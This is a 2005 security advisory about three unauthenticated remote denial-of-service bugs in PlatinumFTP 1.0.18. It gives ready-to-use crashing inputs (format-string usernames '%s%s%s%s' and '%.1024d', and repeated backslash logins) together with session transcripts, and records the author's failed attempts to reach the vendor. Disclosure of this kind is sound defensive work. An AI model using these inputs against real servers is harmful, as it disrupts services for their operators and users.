PlatinumFTP 1.0.18 remote DoS

2005-03-14T00:00:00
ID SECURITYVULNS:DOC:8051
Type securityvulns
Reporter Securityvulns
Modified 2005-03-14T00:00:00

Description

Application: PlantinumFTP Site: http://www.roboshareware.com/indexplatinumftp.php Version: 1.0.18 and maybe lower OS: Windows Bug: Remote Denial of Service

===== Product: PlatinumFTPserver simplifies management of all your Ftp clients with regards to sending and receiving program and data files over an IP connection.

===== About: I didn't found any informations about the Bugs I've found and the vendor doesn't seem to be interested in fixing problems (see History). Since PlatinumFTP isn't a mainstream server I decided to make this Disclosure.

Well, I found 3 different ways do shut down (denial of service) a PlatinumFTP 1.0.18 server. At least you doesn't need a valid user

===== First Bug: You can stop the server using %s%s%s%s as username.

-------------------- schnipp -------------------- ports@boom:~$ ftp 192.168.10.101 Connected to 192.168.10.101. 220-PlatinumFTPserver V1.0.18 220 Enter login details Name (192.168.10.101:ports): %s%s%s%s 421 Service not available, remote server has closed connection Login failed. No control connection for command: Transport endpoint is not connected ftp> -------------------- schnapp --------------------

===== Second Bug: You can stop the server using %.1024d as username.

-------------------- schnipp -------------------- ports@boom:~$ ftp 192.168.10.101 Connected to 192.168.10.101. 220-PlatinumFTPserver V1.0.18 220 Enter login details Name (192.168.10.101:ports): %.1024d 331 Password required for 000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000421 Service not available, remote server has closed connection Login failed. No control connection for command: Transport endpoint is not connected ftp> -------------------- schnapp --------------------

===== Third Bug: Well, shuting down a server using the third bug is, compared to the first Bugs, really tricky cough. If you put in a \ as username the Server will show a requester on his console saying 'Incorrect Format: HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'. The ftp login process for the current session will stop until someone affirmed this message.

I wrote a little perl script to see if it's possible to shut the server down and it's working. You just have to connect a couple of times using the username \ and after a few connections (>50) the server will crash.

Since most of you guys know how to write a script like that I doens't attach it :) Of course you can find them later on my homepage.

===== History: 2005-03-05: Found the Bugs and mailed the vendor 2005-03-07: Mailed the vendor again using all mailaddresse I found 2005-03-10: Created a yahoo-account sigh to make a forum post 2005-03-12: Still no response...

Well, now let's count the hours/days until someone is telling me I'm a fool because I didn't made a working exploit out of it.

ports